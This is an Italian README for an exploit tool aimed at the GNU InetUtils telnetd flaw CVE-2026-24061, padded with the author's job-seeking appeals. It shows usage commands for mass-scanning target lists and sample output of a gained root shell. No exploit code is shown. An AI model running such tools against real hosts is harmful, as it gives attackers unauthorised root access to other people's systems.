
Abyssal è uno scanner di vulnerabilità Telnet ad alte prestazioni per CVE-2026-24061, che fornisce shell di root su sistemi vulnerabili con rilevamento dei falsi positivi.
CVE-2026-24061 Scanner e Exploit della Vulnerabilità Telnet
Dal profondo, risorgiamo.
Scansione multi-thread, rilevamento falsi positivi, shell root interattiva in caso di successo.
Questo progetto è stato realizzato da un professionista IT esperto con decenni di lavoro pratico nella sicurezza di rete, nell'infrastruttura e nello sviluppo software. A 55 anni, sono attivamente alla ricerca di nuove opportunità — sia come dipendente a tempo pieno, freelance o collaboratore di progetto. Se apprezzi l'esperienza, la profonda conoscenza tecnica e un approccio diretto alla risoluzione dei problemi, contattami.
📫 Sono aperto a offerte di lavoro in tutto il mondo.
✉️ Contatto: [[email protected]]
📖 Utilizzo
Scansione di Base (Non Interattiva)
python3 abyssal.py -f targets.txt
Modalità Interattiva (Ottieni Shell in caso di Successo)
python3 abyssal.py -f targets.txt --interactive
Opzioni Avanzate
python3 abyssal.py -f targets.txt -t 20 --interactive -o scan.log
Opzioni della Riga di Comando
| Opzione | Descrizione |
|---|---|
| -f, --file | File con indirizzi IP (default: ip_list.txt) |
| -t, --threads | Numero di thread paralleli (default: 10) |
| -i, --interactive | Modalità interattiva — ottieni la shell su sistemi vulnerabili |
| -o, --output | Nome del file di log (generato automaticamente se non specificato) |
| -c, --connect-timeout | Timeout di connessione in secondi (default: 5) |
| -s, --session-timeout | Timeout sessione in secondi (default: 10) |
| --version | Mostra informazioni sulla versione |
| -h, --help | Mostra il messaggio di aiuto |
📂 Formato del File dei Bersagli
Crea un file con un bersaglio per riga:
# Single IPs
192.168.1.100
10.0.0.50
# IP with custom port
192.168.1.200:2323
# Subnet (CIDR) — support coming soon
# 192.168.1.0/24
# Comments are allowed
172.16.1.25 # Office server
📊 Esempio di Output
╔═══════════════════════════════════════════════════════════════════════════════╗
║ ║
║ █████╗ ██████╗ ██╗ ██╗███████╗███████╗ █████╗ ██╗ ║
║ ██╔══██╗██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██╔══██╗██║ ║
║ ███████║██████╔╝ ╚████╔╝ ███████╗███████╗███████║██║ ║
║ ██╔══██║██╔══██╗ ╚██╔╝ ╚════██║╚════██║██╔══██║██║ ║
║ ██║ ██║██████╔╝ ██║ ███████║███████║██║ ██║███████╗ ║
║ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝ ║
║ ║
║ Abyssal - CVE-2026-24061 Telnet Vulnerability Scanner ║
║ "From the depths, we rise." ║
║ ║
║ Built by: Klaus Baumdick ║
║ Contact: [email protected] ║
║ Status: Open for new opportunities worldwide ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════╝
⚠️ INTERACTIVE MODE ENABLED!
On REAL login prompt or shell, control will be passed to you.
False positives are automatically detected and ignored.
Press CTRL+C to abort.
Starting scan with 10 parallel threads
Total: 100 targets to test
============================================================
🎯 REAL ROOT SHELL (#) ON 192.168.1.100:23 OBTAINED!
============================================================
>>> You now have shell access!
>>> Execute any commands (whoami, id, ls, etc.)
>>> Type 'exit' or press CTRL+C to close
------------------------------------------------------------
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[*] Session on 192.168.1.100:23 closed.
============================================================
SCAN COMPLETED
============================================================
Duration: 45.23 seconds
Targets tested: 100
📊 SUMMARY:
✅ REAL VULNERABLE: 15
🔒 PROTECTED: 42
❓ FAILED: 23
🌐 UNREACHABLE: 20
⚠️ FALSE POSITIVES: 0
🚨 SECURITY WARNING:
15 system(s) are REALLY vulnerable to CVE-2026-24061!
→ Disable or patch Telnet immediately!
→ Use SSH as a secure alternative!
⚠️ Disclaimer
Questo strumento è solo per test di sicurezza autorizzati e scopi educativi.
Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per il test.
L'accesso non autorizzato a sistemi informatici è illegale.
L'autore non si assume alcuna responsabilità per l'uso improprio di questo strumento.
Usalo responsabilmente e a tuo rischio.
📝 Licenza
Questo progetto è concesso in licenza sotto la MIT License — consulta il file LICENSE per i dettagli.
🤝 Contatti
Klaus Baumdick 📫 Email: [email protected]
🔗 GitHub: github.com/stoerti2
📌 Stato: Aperto a nuove opportunità in tutto il mondo
📚 Riferimenti
CVE-2026-24061
Vulnerabilità GNU InetUtils Telnetd
git clone https://github.com/stoerti2/abyssal.git
#┌────────────────────────────────────────────────────────────────────────┐
#│ │
#│ ███████╗████████╗ ██████╗ ███████╗██████╗ ████████╗██╗ │
#│ ██╔════╝╚══██╔══╝██╔═══██╗██╔════╝██╔══██╗╚══██╔══╝██║ │
#│ ███████╗ ██║ ██║ ██║█████╗ ██████╔╝ ██║ ██║ │
#│ ╚════██║ ██║ ██║ ██║██╔══╝ ██╔══██╗ ██║ ██║ │
#│ ███████║ ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║ │
#│ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ │
#│ │
#│ "old school, still root" │
#│ "stoerti - the jobless hacker" │
#│ │
#│ ┌──────────────────────────────────────────────────────────────┐ │
#│ │ 40 years in the trenches. │ 6 months unemployed in DE. │ │
#│ │ They fired the one who knew. │ This is my legacy. │ │
#│ │ -- no patches for reality -- │ │
#│ └──────────────────────────────────────────────────────────────┘ │
#│ │
#└────────────────────────────────────────────────────────────────────────┘
Cos'è Grindware?
Grindware è un software che esiste perché nessuno mi paga per costruire le cose che contano davvero.
Sono disoccupato da sei mesi. Non perché non so programmare – ma perché il mercato non si cura più delle competenze. Si cura di parole d'ordine, certificati e di chi conosci. Così invece di aspettare un lavoro che non arriva mai, costruisco. Grindware è il risultato di tutto ciò.
Perché è ciò che è. Codice scritto durante il grind. Durante le notti tarde. Durante il 47° rifiuto di lavoro. Durante i momenti in cui realizzi che il sistema non si cura di te, quindi tanto vale costruire il tuo. Grindware è codice di sopravvivenza.
Grindware è solo codice. Da uno sviluppatore disoccupato al mondo.
Se usi Grindware, è abbastanza. Se vuoi supportarlo, puoi:
Sono sempre aperto a lavorare. Se hai bisogno di uno sviluppatore che costruisce davvero cose, parliamone.
Grindware – Costruito nel grind, rilasciato gratuitamente.
Per domande o richieste riguardanti questo dataset, contatta [email protected]
Ultimo aggiornamento: Luglio 2026